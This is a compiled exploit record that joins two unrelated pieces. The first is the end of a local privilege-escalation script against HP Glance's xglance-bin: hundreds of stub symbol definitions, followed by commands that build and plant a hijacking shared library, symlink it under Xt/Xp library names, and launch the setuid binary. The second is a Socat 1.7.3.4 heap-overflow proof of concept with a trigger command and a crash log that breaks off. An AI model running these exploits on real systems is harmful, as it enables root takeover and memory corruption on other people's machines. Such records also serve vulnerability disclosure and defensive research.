int _XmTabbedStackListArray = 0;
int XmTabbedStackListCompare = 0;
int XmTabbedStackListCopy = 0;
int _XmTabbedStackListCount = 0;
int XmTabbedStackListCreate = 0;
int XmTabbedStackListFind = 0;
int XmTabbedStackListFree = 0;
int _XmTabbedStackListGet = 0;
int XmTabbedStackListInsert = 0;
int XmTabbedStackListModify = 0;
int XmTabbedStackListQuery = 0;
int XmTabbedStackListRemove = 0;
int XmTabbedStackListSimpleAppend = 0;
int XmTabbedStackListSimpleInsert = 0;
int XmTabbedStackListSimpleModify = 0;
int XmTabbedStackListSimpleQuery = 0;
int XmTabbedStackListSimpleRemove = 0;
int _XmTabBoxCanvas = 0;
int xmTabBoxClassRec = 0;
int XmTabBoxGetIndex = 0;
int _XmTabBoxGetMaxTabHeight = 0;
int _XmTabBoxGetMaxTabWidth = 0;
int XmTabBoxGetNumColumns = 0;
int XmTabBoxGetNumRows = 0;
int _XmTabBoxGetNumRowsColumns = 0;
int XmTabBoxGetNumTabs = 0;
int _XmTabBoxGetTabHeight = 0;
int XmTabBoxGetTabRow = 0;
int _XmTabBoxGetTabWidth = 0;
int _XmTabBoxSelectTab = 0;
int _XmTabBoxStackedGeometry = 0;
int xmTabBoxWidgetClass = 0;
int XmTabBoxXYToIndex = 0;
int xmTabCanvasClassRec = 0;
int xmTabCanvasWidgetClass = 0;
int _XmTabCopy = 0;
int XmTabCreate = 0;
int XmTabFree = 0;
int XmTabGetValues = 0;
int _XmTabListAdd = 0;
int XmTabListCopy = 0;
int _XmTabListDelete = 0;
int XmTabListFree = 0;
int _XmTabListGetPosition = 0;
int XmTabListGetTab = 0;
int XmTabListInsertTabs = 0;
int XmTabListRemoveTabs = 0;
int XmTabListReplacePositions = 0;
int XmTabListTabCount = 0;
int XmTabSetValue = 0;
int xmTabStackClassRec = 0;
int XmTabStackGetSelectedTab = 0;
int XmTabStackIndexToWidget = 0;
int XmTabStackSelectTab = 0;
int xmTabStackWidgetClass = 0;
int XmTargetsAreCompatible = 0;
int _XmTargetsToIndex = 0;
int _XmTearOffB_overrideTranslations = 0;
int _XmTearOffBPrimClassExtRec = 0;
int _XmTearOffBtnDownEventHandler = 0;
int _XmTearOffBtnUpEventHandler = 0;
int xmTearOffButtonClassRec = 0;
int xmTearOffButtonWidgetClass = 0;
int _XmTearOffInitiate = 0;
int _XmTestTraversability = 0;
int _XmTextAdjustGC = 0;
int _XmTextBytesToCharacters = 0;
int _XmTextChangeBlinkBehavior = 0;
int _XmTextChangeHOffset = 0;
int _XmTextChangeVOffset = 0;
int _XmTextCharactersToBytes = 0;
int xmTextClassRec = 0;
int _XmTextClearDestination = 0;
int XmTextClearSelection = 0;
int _XmTextConvert = 0;
int XmTextCopy = 0;
int XmTextCopyLink = 0;
int _XmTextCountCharacters = 0;
int XmTextCut = 0;
int _XmTextDestinationVisible = 0;
int _XmTextDisableRedisplay = 0;
int XmTextDisableRedisplay = 0;
int _XmTextDrawDestination = 0;
int _XmTextEnableRedisplay = 0;
int XmTextEnableRedisplay = 0;
int _XmTextEventBindings1 = 0;
int _XmTextEventBindings2 = 0;
int _XmTextEventBindings3 = 0;
int _XmTextF_EventBindings1 = 0;
int _XmTextF_EventBindings2 = 0;
int _XmTextF_EventBindings3 = 0;
int xmTextFieldClassRec = 0;
int XmTextFieldClearSelection = 0;
int _XmTextFieldConvert = 0;
int XmTextFieldCopy = 0;
int XmTextFieldCopyLink = 0;
int _XmTextFieldCountBytes = 0;
int _XmTextFieldCountCharacters = 0;
int XmTextFieldCut = 0;
int _XmTextFieldDeselectSelection = 0;
int _XmTextFieldDestinationVisible = 0;
int _XmTextFieldDrawInsertionPoint = 0;
int XmTextFieldGetAddMode = 0;
int XmTextFieldGetBaseline = 0;
int XmTextFieldGetBaseLine = 0;
int XmTextFieldGetCursorPosition = 0;
int _XmTextFieldGetDropReciever = 0;
int XmTextFieldGetEditable = 0;
int XmTextFieldGetInsertionPosition = 0;
int XmTextFieldGetLastPosition = 0;
int XmTextFieldGetMaxLength = 0;
int XmTextFieldGetSelection = 0;
int XmTextFieldGetSelectionPosition = 0;
int XmTextFieldGetSelectionWcs = 0;
int XmTextFieldGetString = 0;
int XmTextFieldGetStringWcs = 0;
int XmTextFieldGetSubstring = 0;
int XmTextFieldGetSubstringWcs = 0;
int _XmTextFieldHandleSecondaryFinished = 0;
int XmTextFieldInsert = 0;
int XmTextFieldInsertWcs = 0;
int _XmTextFieldInstallTransferTrait = 0;
int _XmTextFieldLoseSelection = 0;
int XmTextFieldPaste = 0;
int XmTextFieldPasteLink = 0;
int XmTextFieldPosToXY = 0;
int XmTextFieldRemove = 0;
int XmTextFieldReplace = 0;
int _XmTextFieldReplaceText = 0;
int XmTextFieldReplaceWcs = 0;
int XmTextFieldSetAddMode = 0;
int _XmTextFieldSetClipRect = 0;
int _XmTextFieldSetCursorPosition = 0;
int XmTextFieldSetCursorPosition = 0;
int _XmTextFieldSetDestination = 0;
int XmTextFieldSetEditable = 0;
int XmTextFieldSetHighlight = 0;
int XmTextFieldSetInsertionPosition = 0;
int XmTextFieldSetMaxLength = 0;
int _XmTextFieldSetSel2 = 0;
int XmTextFieldSetSelection = 0;
int XmTextFieldSetString = 0;
int XmTextFieldSetStringWcs = 0;
int XmTextFieldShowPosition = 0;
int _XmTextFieldStartSelection = 0;
int xmTextFieldWidgetClass = 0;
int XmTextFieldXYToPos = 0;
int _XmTextFindLineEnd = 0;
int _XmTextFindScroll = 0;
int XmTextFindString = 0;
int _XmTextFindStringBackwards = 0;
int _XmTextFindStringForwards = 0;
int XmTextFindStringWcs = 0;
int _XmTextFPrimClassExtRec = 0;
int _XmTextFreeContextData = 0;
int _XmTextFToggleCursorGC = 0;
int XmTextGetAddMode = 0;
int _XmTextGetAnchor = 0;
int XmTextGetBaseline = 0;
int _XmTextGetBaseLine = 0;
int XmTextGetBaseLine = 0;
int _XmTextGetBaselines = 0;
int XmTextGetCenterline = 0;
int XmTextGetCursorPosition = 0;
int _XmTextGetDisplayRect = 0;
int _XmTextGetDropReciever = 0;
int XmTextGetEditable = 0;
int XmTextGetInsertionPosition = 0;
int XmTextGetLastPosition = 0;
int _XmTextGetLineTable = 0;
int XmTextGetMaxLength = 0;
int _XmTextGetNumberLines = 0;
int _XmTextGetSel2 = 0;
int XmTextGetSelection = 0;
int XmTextGetSelectionPosition = 0;
int XmTextGetSelectionWcs = 0;
int XmTextGetSource = 0;
int XmTextGetString = 0;
int XmTextGetStringWcs = 0;
int XmTextGetSubstring = 0;
int XmTextGetSubstringWcs = 0;
int _XmTextGetTableIndex = 0;
int XmTextGetTopCharacter = 0;
int _XmTextGetTotalLines = 0;
int _XmTextHandleSecondaryFinished = 0;
int _XmTextHasDestination = 0;
int _XmTextInputCreate = 0;
int _XmTextInputGetSecResData = 0;
int XmTextInsert = 0;
int XmTextInsertWcs = 0;
int _XmTextInstallTransferTrait = 0;
int _XmTextInvalidate = 0;
int _XmTextIn_XmTextEventBindings1 = 0;
int _XmTextIn_XmTextEventBindings2 = 0;
int _XmTextIn_XmTextEventBindings3 = 0;
int _XmTextIn_XmTextVEventBindings = 0;
int _XmTextLineInfo = 0;
int _XmTextLoseSelection = 0;
int _XmTextMarginsProc = 0;
int _XmTextMarkRedraw = 0;
int _XmTextModifyVerify = 0;
int _XmTextMovingCursorPosition = 0;
int _XmTextNeedsPendingDeleteDis = 0;
int _XmTextNumLines = 0;
int _XmTextOutLoadGCsAndRecolorCursors = 0;
int _XmTextOutputCreate = 0;
int _XmTextOutputGetSecResData = 0;
int XmTextPaste = 0;
int XmTextPasteLink = 0;
int _XmTextPosToLine = 0;
int XmTextPosToXY = 0;
int _XmTextPrimClassExtRec = 0;
int _XmTextRealignLineTable = 0;
int XmTextRemove = 0;
int _XmTextReplace = 0;
int XmTextReplace = 0;
int XmTextReplaceWcs = 0;
int _XmTextResetClipOrigin = 0;
int _XmTextResetIC = 0;
int XmTextScroll = 0;
int _XmTextScrollable = 0;
int XmTextSetAddMode = 0;
int _XmTextSetCursorPosition = 0;
int XmTextSetCursorPosition = 0;
int _XmTextSetDestinationSelection = 0;
int _XmTextSetEditable = 0;
int XmTextSetEditable = 0;
int _XmTextSetHighlight = 0;
int XmTextSetHighlight = 0;
int XmTextSetInsertionPosition = 0;
int XmTextSetMaxLength = 0;
int _XmTextSetPreeditPosition = 0;
int _XmTextSetSel2 = 0;
int XmTextSetSelection = 0;
int XmTextSetSource = 0;
int XmTextSetString = 0;
int XmTextSetStringWcs = 0;
int _XmTextSetTopCharacter = 0;
int XmTextSetTopCharacter = 0;
int _XmTextShouldWordWrap = 0;
int _XmTextShowPosition = 0;
int XmTextShowPosition = 0;
int _XmTextToggleCursorGC = 0;
int _XmTextToLocaleText = 0;
int _XmTextUpdateLineTable = 0;
int _XmTextValidate = 0;
int _XmTextValueChanged = 0;
int xmTextWidgetClass = 0;
int XmTextXYToPos = 0;
int _XmToggleBCacheCompare = 0;
int _XmToggleB_defaultTranslations = 0;
int _XmToggleBGadClassExtRec = 0;
int _XmToggleB_menuTranslations = 0;
int _XmToggleBPrimClassExtRec = 0;
int xmToggleButtonClassRec = 0;
int xmToggleButtonGadgetClass = 0;
int xmToggleButtonGadgetClassRec = 0;
int XmToggleButtonGadgetGetState = 0;
int XmToggleButtonGadgetSetState = 0;
int XmToggleButtonGadgetSetValue = 0;
int xmToggleButtonGCacheObjClassRec = 0;
int XmToggleButtonGetState = 0;
int XmToggleButtonSetState = 0;
int XmToggleButtonSetValue = 0;
int xmToggleButtonWidgetClass = 0;
int _XmToHorizontalPixels = 0;
int _XmToLayoutDirection = 0;
int _XmToolTipEnter = 0;
int XmToolTipGetLabel = 0;
int _XmToolTipLeave = 0;
int _XmToolTipRemove = 0;
int _XmToPanedPixels = 0;
int _XmTopShadowColorDefault = 0;
int _XmTopShadowPixmapDefault = 0;
int _XmToVerticalPixels = 0;
int XmTrackingEvent = 0;
int XmTrackingLocate = 0;
int _XmTrackShellFocus = 0;
int XmTransferDone = 0;
int _XmTransferGetDestinationCBStruct = 0;
int XmTransferSendRequest = 0;
int XmTransferSetParameters = 0;
int XmTransferStartRequest = 0;
int XmTransferValue = 0;
int _XmTransformSubResources = 0;
int XmTranslateKey = 0;
int _XmTraverse = 0;
int _XmTraverseAway = 0;
int _XmTraverseDown = 0;
int _XmTraverseHome = 0;
int _XmTraverseLeft = 0;
int _XmTraverseNext = 0;
int _XmTraverseNextTabGroup = 0;
int _XmTraversePrev = 0;
int _XmTraversePrevTabGroup = 0;
int _XmTraverseRight = 0;
int _XmTraverseUp = 0;
int _XmTravGraphAdd = 0;
int _XmTravGraphRemove = 0;
int _XmTravGraphUpdate = 0;
int xmTreeClassRec = 0;
int xmTreeWidgetClass = 0;
int XmuNCopyISOLatin1Lowered = 0;
int _XmUnhighlightBorder = 0;
int XmUninstallImage = 0;
int _XmUnitTypeDefault = 0;
int XmUpdateDisplay = 0;
int _XmUseColorObj = 0;
int xmUseVersion = 0;
int _XmUtf8ToUcs2 = 0;
int _XmUtilIsSubclassByNameQ = 0;
int XmVaCreateArrowButton = 0;
int XmVaCreateArrowButtonGadget = 0;
int XmVaCreateBulletinBoard = 0;
int XmVaCreateButtonBox = 0;
int XmVaCreateCascadeButton = 0;
int XmVaCreateCascadeButtonGadget = 0;
int XmVaCreateColorSelector = 0;
int XmVaCreateColumn = 0;
int XmVaCreateCombinationBox2 = 0;
int XmVaCreateComboBox = 0;
int XmVaCreateCommand = 0;
int XmVaCreateContainer = 0;
int XmVaCreateDataField = 0;
int XmVaCreateDrawingArea = 0;
int XmVaCreateDrawnButton = 0;
int XmVaCreateDropDown = 0;
int XmVaCreateExt18List = 0;
int XmVaCreateFileSelectionBox = 0;
int XmVaCreateForm = 0;
int XmVaCreateFrame = 0;
int XmVaCreateIconGadget = 0;
int XmVaCreateLabel = 0;
int XmVaCreateLabelGadget = 0;
int XmVaCreateList = 0;
int XmVaCreateMainWindow = 0;
int XmVaCreateManagedArrowButton = 0;
int XmVaCreateManagedArrowButtonGadget = 0;
int XmVaCreateManagedBulletinBoard = 0;
int XmVaCreateManagedButtonBox = 0;
int XmVaCreateManagedCascadeButton = 0;
int XmVaCreateManagedCascadeButtonGadget = 0;
int XmVaCreateManagedColorSelector = 0;
int XmVaCreateManagedColumn = 0;
int XmVaCreateManagedCombinationBox2 = 0;
int XmVaCreateManagedComboBox = 0;
int XmVaCreateManagedCommand = 0;
int XmVaCreateManagedContainer = 0;
int XmVaCreateManagedDataField = 0;
int XmVaCreateManagedDrawingArea = 0;
int XmVaCreateManagedDrawnButton = 0;
int XmVaCreateManagedDropDown = 0;
int XmVaCreateManagedExt18List = 0;
int XmVaCreateManagedFileSelectionBox = 0;
int XmVaCreateManagedForm = 0;
int XmVaCreateManagedFrame = 0;
int XmVaCreateManagedIconGadget = 0;
int XmVaCreateManagedLabel = 0;
int XmVaCreateManagedLabelGadget = 0;
int XmVaCreateManagedList = 0;
int XmVaCreateManagedMainWindow = 0;
int XmVaCreateManagedMessageBox = 0;
int XmVaCreateManagedMultiList = 0;
int XmVaCreateManagedNotebook = 0;
int XmVaCreateManagedPanedWindow = 0;
int XmVaCreateManagedPushButton = 0;
int XmVaCreateManagedPushButtonGadget = 0;
int XmVaCreateManagedRowColumn = 0;
int XmVaCreateManagedScale = 0;
int XmVaCreateManagedScrollBar = 0;
int XmVaCreateManagedScrolledWindow = 0;
int XmVaCreateManagedSelectionBox = 0;
int XmVaCreateManagedSeparator = 0;
int XmVaCreateManagedSeparatorGadget = 0;
int XmVaCreateManagedSimpleSpinBox = 0;
int XmVaCreateManagedSpinBox = 0;
int XmVaCreateManagedTabStack = 0;
int XmVaCreateManagedText = 0;
int XmVaCreateManagedTextField = 0;
int XmVaCreateManagedToggleButton = 0;
int XmVaCreateManagedToggleButtonGadget = 0;
int XmVaCreateMessageBox = 0;
int XmVaCreateMultiList = 0;
int XmVaCreateNotebook = 0;
int XmVaCreatePanedWindow = 0;
int XmVaCreatePushButton = 0;
int XmVaCreatePushButtonGadget = 0;
int XmVaCreateRowColumn = 0;
int XmVaCreateScale = 0;
int XmVaCreateScrollBar = 0;
int XmVaCreateScrolledWindow = 0;
int XmVaCreateSelectionBox = 0;
int XmVaCreateSeparator = 0;
int XmVaCreateSeparatorGadget = 0;
int XmVaCreateSimpleCheckBox = 0;
int XmVaCreateSimpleMenuBar = 0;
int XmVaCreateSimpleOptionMenu = 0;
int XmVaCreateSimplePopupMenu = 0;
int XmVaCreateSimplePulldownMenu = 0;
int XmVaCreateSimpleRadioBox = 0;
int XmVaCreateSimpleSpinBox = 0;
int XmVaCreateSpinBox = 0;
int XmVaCreateTabStack = 0;
int XmVaCreateText = 0;
int XmVaCreateTextField = 0;
int XmVaCreateToggleButton = 0;
int XmVaCreateToggleButtonGadget = 0;
int _XmValidateFocus = 0;
int _XmValidCursorIconQuark = 0;
int _XmValidTimestamp = 0;
int _XmVaToTypedArgList = 0;
int _XmVendorExtRealize = 0;
int xmVendorShellExtClassRec = 0;
int xmVendorShellExtObjectClass = 0;
int _XmVersionString = 0;
int _XmVirtKeys_acornFallbackBindingString = 0;
int _XmVirtKeys_apolloFallbackBindingString = 0;
int _XmVirtKeys_dblclkFallbackBindingString = 0;
int _XmVirtKeys_decFallbackBindingString = 0;
int _XmVirtKeysDestroy = 0;
int _XmVirtKeys_dgFallbackBindingString = 0;
int _XmVirtKeys_fallbackBindingString = 0;
int _XmVirtKeysHandler = 0;
int _XmVirtKeys_hpFallbackBindingString = 0;
int _XmVirtKeys_ibmFallbackBindingString = 0;
int _XmVirtKeys_ingrFallbackBindingString = 0;
int _XmVirtKeysInitialize = 0;
int _XmVirtKeysLoadFallbackBindings = 0;
int _XmVirtKeysLoadFileBindings = 0;
int _XmVirtKeys_megatekFallbackBindingString = 0;
int _XmVirtKeys_motorolaFallbackBindingString = 0;
int _XmVirtKeys_sgiFallbackBindingString = 0;
int _XmVirtKeys_siemens9733FallbackBindingString = 0;
int _XmVirtKeys_siemensWx200FallbackBindingString = 0;
int _XmVirtKeys_sunFallbackBindingString = 0;
int _XmVirtKeys_tekFallbackBindingString = 0;
int _XmVirtualToActualKeysym = 0;
int _XmWarning = 0;
int _XmWarningMsg = 0;
int _XmWhitePixel = 0;
int _XmWidgetFocusChange = 0;
int XmWidgetGetBaselines = 0;
int XmWidgetGetDisplayRect = 0;
int _XmWidgetIsTraversable = 0;
int xmWorldClass = 0;
int xmWorldClassRec = 0;
int xmWorldObjectClass = 0;
int _XmWriteDragBuffer = 0;
int _XmWriteDSToStream = 0;
int _XmWriteInitiatorInfo = 0;
int _XmXftDrawCreate = 0;
int _XmXftDrawDestroy = 0;
int _XmXftDrawString = 0;
int _XmXftDrawString2 = 0;
int _XmXftFontAverageWidth = 0;
int _XmXftGetXftColor = 0;
int _XmXftSetClipRectangles = 0;
int _Xmxpmatoui = 0;
int _XmxpmColorKeys = 0;
int _XmxpmCreateImageFromPixmap = 0;
int _XmxpmCreatePixmapFromImage = 0;
int _XmxpmDataTypes = 0;
int _XmxpmFreeColorTable = 0;
int _XmxpmFreeRgbNames = 0;
int _XmxpmGetCmt = 0;
int _XmxpmGetRgbName = 0;
int _XmxpmGetString = 0;
int _XmxpmHashIntern = 0;
int _XmxpmHashSlot = 0;
int _XmxpmHashTableFree = 0;
int _XmxpmHashTableInit = 0;
int _XmxpmInitAttributes = 0;
int _XmxpmInitXpmImage = 0;
int _XmxpmInitXpmInfo = 0;
int _XmxpmNextString = 0;
int _XmxpmNextUI = 0;
int _XmxpmNextWord = 0;
int _XmxpmParseColors = 0;
int _XmxpmParseData = 0;
int _XmxpmParseDataAndCreate = 0;
int _XmxpmParseExtensions = 0;
int _XmxpmParseHeader = 0;
int _XmxpmParseValues = 0;
int _XmxpmReadRgbNames = 0;
int _XmxpmSetAttributes = 0;
int _XmxpmSetInfo = 0;
int _XmxpmSetInfoMask = 0;
int _Xmxpm_xynormalizeimagebits = 0;
int _Xmxpm_znormalizeimagebits = 0;
int XNextEvent = 0;
int XOffsetRegion = 0;
int XOMOfOC = 0;
int XOpenDisplay = 0;
int XOpenIM = 0;
int XParseColor = 0;
int XPeekEvent = 0;
int XPending = 0;
int Xpms_popen = 0;
int XPolygonRegion = 0;
int XPutBackEvent = 0;
int XPutImage = 0;
int XQueryBestCursor = 0;
int XQueryColor = 0;
int XQueryColors = 0;
int XQueryPointer = 0;
int XQueryTree = 0;
int XRaiseWindow = 0;
int XReadBitmapFileData = 0;
int XRecolorCursor = 0;
int XRectInRegion = 0;
int XReparentWindow = 0;
int XrmCombineDatabase = 0;
int XrmDestroyDatabase = 0;
int XrmGetStringDatabase = 0;
int XrmPermStringToQuark = 0;
int XrmPutResource = 0;
int XrmPutStringResource = 0;
int XrmQGetResource = 0;
int XrmQGetSearchList = 0;
int XrmQGetSearchResource = 0;
int XrmQuarkToString = 0;
int XrmStringToQuark = 0;
int XrmUniqueQuark = 0;
int XRotateBuffers = 0;
int XSaveContext = 0;
int XScreenCount = 0;
int XScreenNumberOfScreen = 0;
int XScreenOfDisplay = 0;
int XSelectInput = 0;
int XSendEvent = 0;
int XSetClipMask = 0;
int XSetClipOrigin = 0;
int XSetClipRectangles = 0;
int XSetCloseDownMode = 0;
int XSetErrorHandler = 0;
int XSetFillStyle = 0;
int XSetForeground = 0;
int XSetFunction = 0;
int XSetICFocus = 0;
int XSetICValues = 0;
int XSetInputFocus = 0;
int XSetLineAttributes = 0;
int XSetLocaleModifiers = 0;
int XSetOCValues = 0;
int XSetRegion = 0;
int XSetSelectionOwner = 0;
int XSetStipple = 0;
int XSetTextProperty = 0;
int XSetTSOrigin = 0;
int XSetWindowBackground = 0;
int XSetWindowBackgroundPixmap = 0;
int XSetWMColormapWindows = 0;
int XShapeCombineMask = 0;
int XShapeCombineRectangles = 0;
int XShapeQueryExtension = 0;
int __xstat64 = 0;
int XStoreBuffer = 0;
int XStoreColor = 0;
int XStringToKeysym = 0;
int XSubtractRegion = 0;
int XSync = 0;
int XtAddCallback = 0;
int XtAddEventHandler = 0;
int XtAddGrab = 0;
int XtAddRawEventHandler = 0;
int XtAllocateGC = 0;
int XtAppAddTimeOut = 0;
int XtAppAddWorkProc = 0;
int XtAppCreateShell = 0;
int XtAppErrorMsg = 0;
int XtAppGetExitFlag = 0;
int XtAppGetSelectionTimeout = 0;
int XtAppLock = 0;
int XtAppNextEvent = 0;
int XtAppPending = 0;
int XtAppProcessEvent = 0;
int XtAppSetSelectionTimeout = 0;
int XtAppSetTypeConverter = 0;
int XtAppSetWarningMsgHandler = 0;
int XtAppUnlock = 0;
int XtAppWarningMsg = 0;
int XtAugmentTranslations = 0;
int XtBuildEventMask = 0;
int XtCallActionProc = 0;
int XtCallCallbackList = 0;
int XtCallCallbacks = 0;
int XtCallConverter = 0;
int XtCalloc = 0;
int XtCancelSelectionRequest = 0;
int XtConfigureWidget = 0;
int XtConvertAndStore = 0;
int XtConvertCase = 0;
int XtCreateManagedWidget = 0;
int XtCreatePopupShell = 0;
int XtCreateSelectionRequest = 0;
int XtCreateWidget = 0;
int XtCreateWindow = 0;
int XtCvtStringToFontSet = 0;
int XtCvtStringToFontStruct = 0;
int XtCvtStringToPixel = 0;
int XtDatabase = 0;
int XtDestroyApplicationContext = 0;
int XtDestroyWidget = 0;
int XtDisownSelection = 0;
int XtDispatchEvent = 0;
int XtDisplayOfObject = 0;
int XtDisplayStringConversionWarning = 0;
int XtDisplayToApplicationContext = 0;
int XtError = 0;
int XtErrorMsg = 0;
int XTextExtents = 0;
int XTextExtents16 = 0;
int XTextWidth = 0;
int XTextWidth16 = 0;
int XtFree = 0;
int XtGetActionKeysym = 0;
int XtGetApplicationNameAndClass = 0;
int XtGetApplicationResources = 0;
int XtGetConstraintResourceList = 0;
int XtGetErrorDatabaseText = 0;
int XtGetGC = 0;
int XtGetKeysymTable = 0;
int XtGetMultiClickTime = 0;
int XtGetResourceList = 0;
int XtGetSelectionParameters = 0;
int XtGetSelectionRequest = 0;
int XtGetSelectionValue = 0;
int XtGetSelectionValueIncremental = 0;
int XtGetSelectionValues = 0;
int XtGetSelectionValuesIncremental = 0;
int XtGetSubresources = 0;
int XtGetSubvalues = 0;
int XtGetValues = 0;
int XtGrabButton = 0;
int XtGrabKey = 0;
int XtGrabKeyboard = 0;
int XtGrabPointer = 0;
int XtHasCallbacks = 0;
int _XtInherit = 0;
int _XtInheritTranslations = 0;
int XtInitializeWidgetClass = 0;
int XtInsertEventHandler = 0;
int XtInstallAccelerators = 0;
int XtIsManaged = 0;
int XtIsSensitive = 0;
int XtIsSubclass = 0;
int _XtIsSubclassOf = 0;
int XtLastEventProcessed = 0;
int XtLastTimestampProcessed = 0;
int XtMakeGeometryRequest = 0;
int XtMakeResizeRequest = 0;
int XtMalloc = 0;
int XtManageChild = 0;
int XtManageChildren = 0;
int XtMergeArgLists = 0;
int XtMoveWidget = 0;
int XtName = 0;
int XtNameToWidget = 0;
int XtOverrideTranslations = 0;
int XtOwnSelection = 0;
int XtOwnSelectionIncremental = 0;
int XtParseAcceleratorTable = 0;
int XtParseTranslationTable = 0;
int XtPopdown = 0;
int XtPopup = 0;
int XtProcessLock = 0;
int XtProcessUnlock = 0;
int XtQueryGeometry = 0;
int XTranslateCoordinates = 0;
int XtRealizeWidget = 0;
int XtRealloc = 0;
int XtRegisterGrabAction = 0;
int XtReleaseGC = 0;
int XtRemoveAllCallbacks = 0;
int XtRemoveCallback = 0;
int XtRemoveEventHandler = 0;
int XtRemoveGrab = 0;
int XtRemoveTimeOut = 0;
int XtRemoveWorkProc = 0;
int XtResizeWidget = 0;
int XtResolvePathname = 0;
int XtScreenDatabase = 0;
int XtScreenOfObject = 0;
int XtSendSelectionRequest = 0;
int XtSetKeyboardFocus = 0;
int XtSetKeyTranslator = 0;
int XtSetMappedWhenManaged = 0;
int XtSetSelectionParameters = 0;
int XtSetSensitive = 0;
int XtSetSubvalues = 0;
int XtSetTypeConverter = 0;
int XtSetValues = 0;
int XtShellStrings = 0;
int XtStrings = 0;
int XtTranslateCoords = 0;
int XtTranslateKey = 0;
int XtUngrabButton = 0;
int XtUngrabKey = 0;
int XtUngrabKeyboard = 0;
int XtUngrabPointer = 0;
int XtUnmanageChild = 0;
int XtUnmanageChildren = 0;
int XtVaCreateManagedWidget = 0;
int XtVaCreateWidget = 0;
int XtVaGetValues = 0;
int XtVaSetValues = 0;
int XtWarning = 0;
int XtWarningMsg = 0;
int XtWidgetToApplicationContext = 0;
int XtWindowOfObject = 0;
int XtWindowToWidget = 0;
int XUngrabKeyboard = 0;
int XUngrabPointer = 0;
int XUngrabServer = 0;
int XUnionRectWithRegion = 0;
int XUnionRegion = 0;
int XUnmapWindow = 0;
int XUnsetICFocus = 0;
int Xutf8DrawImageString = 0;
int Xutf8DrawString = 0;
int Xutf8TextEscapement = 0;
int Xutf8TextExtents = 0;
int Xutf8TextListToTextProperty = 0;
int XVaCreateNestedList = 0;
int XWarpPointer = 0;
int XwcDrawImageString = 0;
int XwcDrawString = 0;
int XwcTextEscapement = 0;
int XwcTextExtents = 0;
int XWidthOfScreen = 0;
int XWindowEvent = 0;
int XWithdrawWindow = 0;
int overrideShellWidgetClass = 0;
DONE
echo "[+] Compiling the code..."
/usr/bin/gcc -fPIC -shared -static-libgcc -o libXm.so.3 lib.c
echo "[+] Cleaning up..."
/bin/rm -f lib.c
mkdir -p ./-L/lib64
mv libXm.so.3 ./-L/lib64
cd ./-L/lib64
ln -s libXm.so.3 libXp.so.6
ln -s libXm.so.3 libXt.so.6
cd ../../
echo "[+] Attempting to exploit the xglance-bin: "
/opt/perf/bin/xglance-bin
# Exploit Title: Socat 1.7.3.4 - Heap Based Overflow (PoC)
# Date: 2020-02-03
# Exploit Author: hieubl from HPT Cyber Security
# Vendor Homepage: http://www.dest-unreach.org/
# Software Link: http://www.dest-unreach.org/socat/
# Version: 1.7.3.4
# Tested on: Ubuntu 16.04.6 LTS
# CVE :
# Heap-Based Overflow due to Integer Overflow and Lack of PIE mitigation (PoC)
------- [***Description***] -------
The source code of socat.c contains _socat() function which has the
Integer Overflow vulnerability:
int _socat(void) {
...
unsigned char *buff;
...
buff = Malloc(2*socat_opts.bufsiz+1)
...
}
After that, the the line of code "if ((bytes2 = xiotransfer(sock2,
sock1, &buff, socat_opts.bufsiz, true)) < 0) {" calls the
xiotransfer() function. The xiotransfer() function calls xioread()
function. Finally xioread() function calls Read() function.
ssize_t xioread(xiofile_t *file, void *buff, size_t bufsiz) {
...
Read(pipe->fd, buff, bufsiz); //[***!!!This line of code leads to
Heap-Based Overflow vulnerability***!!!]
...
}
In addition, the "Makefile" file does not turn on the Position
Independent Executables (PIE) mitigation (the CFLAGS does not contains
"-pie" flag). By default, Ubuntu 16.04 does not turn on this
mitigation. Consequently, it is easier to exploit the program, may
even lead to Remode Code Execution (RCE).
Reference: https://hackerone.com/reports/415272, $100 bounty for Linux
Desktop application slack executable does not use pie / no ASLR
------- [***Download and build***] -------
Download link: http://www.dest-unreach.org/socat/download/socat-1.7.3.4.tar.gz
$ tar xzvf socat-1.7.3.4.tar.gz
$ cd socat-1.7.3.4/
$ ./configure
Modify "Makefile" file: "CFLAGS = -g -O -D_GNU_SOURCE -Wall
-Wno-parentheses $(CCOPTS) $(DEFS) $(CPPFLAGS)" (add "-g" flag for
debugging purpose)
$ make
$ sudo make install
------- [***Proof of Concept***] -------
$ checksec socat
[*] '/home/natsu/temp/socat-1.7.3.4/socat'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
FORTIFY: Enabled
>>> There is no PIE mitigation!
$ python -c 'print "A"*1000000' > a
$ touch b
$ socat -b9223372036854775888 OPEN:a,readbytes=1000000 OPEN:b,readbytes=1000000
This proof of concept triggers the bugs by setting the buffer size to
0x8000000000000050(9223372036854775888 in decimal). Therefore, the malloc
size is passed to "Malloc(2*socat_opts.bufsiz+1)" is 0x100000000000000a0.
This is equivalent to Malloc(0xa0). The readbytes("readbytes=1000000")
controls the size of reading (we cannot read with the size too large as
0x8000000000000050) with these lines of code: if (pipe->readbytes) { if
(pipe->actbytes == 0) { return 0; } if (pipe->actbytes < bufsiz) { bufsiz =
pipe->actbytes; } } ------- [***Crash logs***] ------- *** Error in
`socat': free(): invalid next size (normal): 0x000000000106a110 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fc0ee5817e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7fc0ee58a37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7fc0ee58e53c]
socat[0x407e3f]
socat[0x4084c6]
socat[0x408f7a]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fc0ee52a830]
socat[0x4057a9]
======= Memory map: ========
00400000-0044a000 r-xp 00000000 08:01 655643
/usr/local/bin/socat
00649000-0064a000 r--p 00049000 08:01 655643
/usr/local/bin/socat
0064a000-0064b000 rw-p 0004a000 08:01 655643
/usr/local/bin/socat
0064b000-0068c000 rw-p 00000000 00:00 0
01069000-0108a000 rw-p 00000000 00:00 0
[heap]
7fc0e8000000-7fc0e8021000 rw-p 00000000 00:00 0
7fc0e8021000-7fc0ec000000 ---p 00000000 00:00 0
7fc0eded3000-7fc0edee9000 r-xp 00000000 08:01 397801
/lib/x86_64-linux-gnu/libgcc_s.so.1
7fc0edee9000-7fc0ee0e8000 ---p 00016000 08:01 397801
/lib/x86_64-linux-gnu/libgcc_s.so.1
7fc0ee0e8000-7fc0ee0e9000 rw-p 00015000 08:01 397801
/lib/x86_64-linux-gnu/libgcc_s.so.1
